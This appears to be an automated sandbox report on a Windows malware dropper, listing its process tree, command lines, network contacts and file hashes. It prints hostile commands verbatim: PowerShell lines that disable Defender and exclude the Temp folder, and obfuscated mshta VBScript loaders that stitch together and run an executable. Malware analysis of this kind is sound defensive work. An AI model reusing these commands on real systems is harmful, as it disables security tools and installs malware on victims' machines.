PID 2804 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2588 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2588 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2588 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2588 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2588 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2588 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2588 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2596 wrote to memory of 2616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2596 wrote to memory of 2616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2596 wrote to memory of 2616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2596 wrote to memory of 2616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2596 wrote to memory of 2616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2596 wrote to memory of 2616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2596 wrote to memory of 2616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2804 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe

"C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed067ba5199af5f.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed067fa7edd4b875a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed06d8092a5ae.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0639114ac9fa.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed068cfd71e196da.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed068a6c101a0e81.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed062a0488e6dd1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed06384ea2548.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0625413f2fb.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed062272ee8a02b1746.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed06dffacb42ccf1c.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062a0488e6dd1.exe

Wed062a0488e6dd1.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0625413f2fb.exe

Wed0625413f2fb.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe

Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe

Wed067fa7edd4b875a.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068cfd71e196da.exe

Wed068cfd71e196da.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06d8092a5ae.exe

Wed06d8092a5ae.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06dffacb42ccf1c.exe

Wed06dffacb42ccf1c.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe

Wed067ba5199af5f.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0639114ac9fa.exe

Wed0639114ac9fa.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06384ea2548.exe

Wed06384ea2548.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe

Wed062272ee8a02b1746.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 272

C:\Users\Admin\AppData\Local\Temp\is-2TOLQ.tmp\Wed067fa7edd4b875a.tmp

"C:\Users\Admin\AppData\Local\Temp\is-2TOLQ.tmp\Wed067fa7edd4b875a.tmp" /SL5="$7011C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct ( "WSCrIpT.ShELl"). RuN ( "cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF """" == """" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe"" ) do taskkill /F /im ""%~NXm"" " , 0, true ))

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe

"C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-MCLIP.tmp\Wed067fa7edd4b875a.tmp

"C:\Users\Admin\AppData\Local\Temp\is-MCLIP.tmp\Wed067fa7edd4b875a.tmp" /SL5="$4020C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /Y "C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF "" == "" for %m In ( "C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe" ) do taskkill /F /im "%~NXm"

C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe

05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /im "Wed062272ee8a02b1746.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct ( "WSCrIpT.ShELl"). RuN ( "cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF ""/PttJqbtIGV_gKpayWgLcpQuUGXL9h"" == """" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe"" ) do taskkill /F /im ""%~NXm"" " , 0, true ))

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /Y "C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF "/PttJqbtIGV_gKpayWgLcpQuUGXL9h" == "" for %m In ( "C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe" ) do taskkill /F /im "%~NXm"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscrIpt: ClOse ( cReateobJecT ( "wScriPT.shEll" ). Run ("C:\Windows\system32\cmd.exe /q /C Echo | sEt /P = ""MZ"" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS + ZSPELY.cNM + OJM3YR.X + SVnzW.C2 + AmtZY.zXT + LPME79O.f1 + NytFSko.4 m9WDKH25.n & STart msiexec -y .\M9WDkH25.n " , 0 , TrUe ))

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C Echo | sEt /P = "MZ" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS + ZSPELY.cNM + OJM3YR.X + SVnzW.C2 + AmtZY.zXT + LPME79O.f1 + NytFSko.4 m9WDKH25.n & STart msiexec -y .\M9WDkH25.n

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" Echo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>X5W6AA.ZS"

C:\Windows\SysWOW64\msiexec.exe

msiexec -y .\M9WDkH25.n

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2804 -s 456

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 mooorni.xyz udp
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 propanla.com udp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
FI 135.181.129.119:4805 tcp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 iplogger.org udp
FR 51.178.186.149:80 tcp
US 172.67.74.161:443 iplogger.org tcp
US 172.67.74.161:443 iplogger.org tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
N/A 127.0.0.1:49288 tcp
N/A 127.0.0.1:49290 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
US 72.84.118.132:8080 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
US 72.84.118.132:8080 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.23.210.75:80 r11.o.lencr.org tcp
US 8.8.8.8:53 www.qxsgxd.com udp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.18:80 crl.microsoft.com tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp

Files

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 bc10ee7cbbf3ea8b505c94bd655f5e50
SHA1 4667e7d52e54ba83ee7c264c14171a4db0d1c444
SHA256 33ea6a4e83204a0798a7a4e6d3361618e171d37342ed1b16d33b504eafb3b111
SHA512 a1e2349e226e83fa041ca5ade434927c5ca2a7f4c3f322944cce829c7ae5aa47376b7a9825618d3393668751baa3b45be55c749625344764a2532e92a167815f

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe

MD5 35799316b448a835e4784fbdd26b5648
SHA1 fc39b78cc7615b4cbc65aff8b4d14d7b1b234cd5
SHA256 2a41d70eb106e926765798e9a407e88e49c07099247cd33924d7faa60e3e7ef0
SHA512 ae2d8b3bccbe0e7820ba6c25d76251c400b40a40fbd610b182ae8ec51154e66670b30cf13a62d06067024e9ffb9447bea6647be312e2c01f0ac6c4ea602a9660

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/2804-64-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2804-75-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2804-81-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2804-80-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2804-77-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2804-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe

MD5 508251b34a5ea5271e6c8d365b3623d2
SHA1 a6f057ba3154fca2a2000cbb7ee9c171c682a8ac
SHA256 a111e371822094423c652cef67b75663d97e7d7a18c33213d745a1f2075d210f
SHA512 981e33ee2c1d699304165d7d96af3de99509b7dc0ce6f7a3e49c763f58ae4227f1d60056997adc366de9203d86d469de3062542b2ba147303848d6e4d26bf170

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068cfd71e196da.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06384ea2548.exe

MD5 bdbbf4f034c9f43e4ab00002eb78b990
SHA1 99c655c40434d634691ea1d189b5883f34890179
SHA256 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512 dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06dffacb42ccf1c.exe

MD5 cf1ef22fba3b8080deab8dd3ec2dbe79
SHA1 62c57835497002d7f760fabb77969281b4ccf3e0
SHA256 0826cf8b1478cc5c892d724e30c9d69a0fd765780f916bb0943d73f3cd3866e0
SHA512 7a997cbbbdccc75a624ee9f67632024479fdb7a1588c462479c0d4b967373290640bd6b98d08f633d5e71d026faf5343de1d3a61c125e1a04d5ea518275a9e1f

\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0639114ac9fa.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062a0488e6dd1.exe

MD5 c950dfa870dc50ce6e1e2fcaeb362de4
SHA1 fc1fb7285afa8d17010134680244a19f9da847a1
SHA256 b7fd0c0227a445847a051fe986bc517e2b136682d98dbe5349e2bc75e0e9e4ec
SHA512 4117875063173b5767b98300d493e2aee310a76651411ceb2f34588ae5785a0893979699c10e07d0f52d84442db6967b7155875bc7ef738a8e2c49fa70acd1f2

memory/1840-122-0x0000000000400000-0x0000000000414000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06d8092a5ae.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe

MD5 a4bf9671a96119f7081621c2f2e8807d
SHA1 47f50ae20bfa8b277f8c8c1963613d3f4c364b94
SHA256 d9e5cf75da07717a818853d2f1aa79d3d1aaa155bb06fffed3c92ccaf972aef7
SHA512 f0af42f99f09b5c118ebd275d0b905b91d93893034c98b84c370e7243e1b55502585808cfa33a1779d478f6e308eb32f1896d57a5f6fab0edc4362def08a5b0a

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe

MD5 363f9dd72b0edd7f0188224fb3aee0e2
SHA1 2ee4327240df78e318937bc967799fb3b846602e
SHA256 e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167
SHA512 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece

memory/1424-143-0x0000000000220000-0x0000000000290000-memory.dmp

memory/1840-148-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1728-153-0x00000000002E0000-0x00000000002E6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-MCLIP.tmp\Wed067fa7edd4b875a.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/1644-149-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1848-147-0x0000000000400000-0x00000000004BD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-J1DPV.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\is-J1DPV.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/2116-166-0x00000000003D0000-0x00000000003D8000-memory.dmp

memory/2632-181-0x00000000009F0000-0x0000000000B4D000-memory.dmp

memory/1728-142-0x0000000000380000-0x0000000000396000-memory.dmp

memory/1536-141-0x00000000013D0000-0x0000000001440000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0625413f2fb.exe

MD5 69c4678681165376014646030a4fe7e4
SHA1 fb110dad415ac036c828b51c38debd34045aa0f3
SHA256 90b33beb786f0c1274a79cda8d18e43b5ed5f2cad0b1e0de7b3b42370d2ffa77
SHA512 81dcc6b46e99ef8242c0f2a0bc9f35c60f4111f7b083ffdd8c3d7195292deb5eda035c010d946cfdd9e212f7ea320f67b354c1c40b53808b996de3cd69feca1c

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LJXEGA87TDX8247FU3MX.temp

MD5 794da3a27b3d340793e14266f6d479f8
SHA1 5ad8b9c2a2dc1614975fabe72b965843004c1a35
SHA256 a2dfdb16600066aab5ff67f4cff16c1c237f40e85a061cad7c749246c3624a28
SHA512 90679ec1677bc360f1ff6ce66d3c66102fa3c0141e6ec1a7968e2a6040a858194838462f73a3d31d78b3298e323107a801b61c70136cd0db3916f5620573a813

memory/2804-79-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2804-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2804-74-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2804-73-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2804-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zS028D4896\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

\Users\Admin\AppData\Local\Temp\7zS028D4896\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
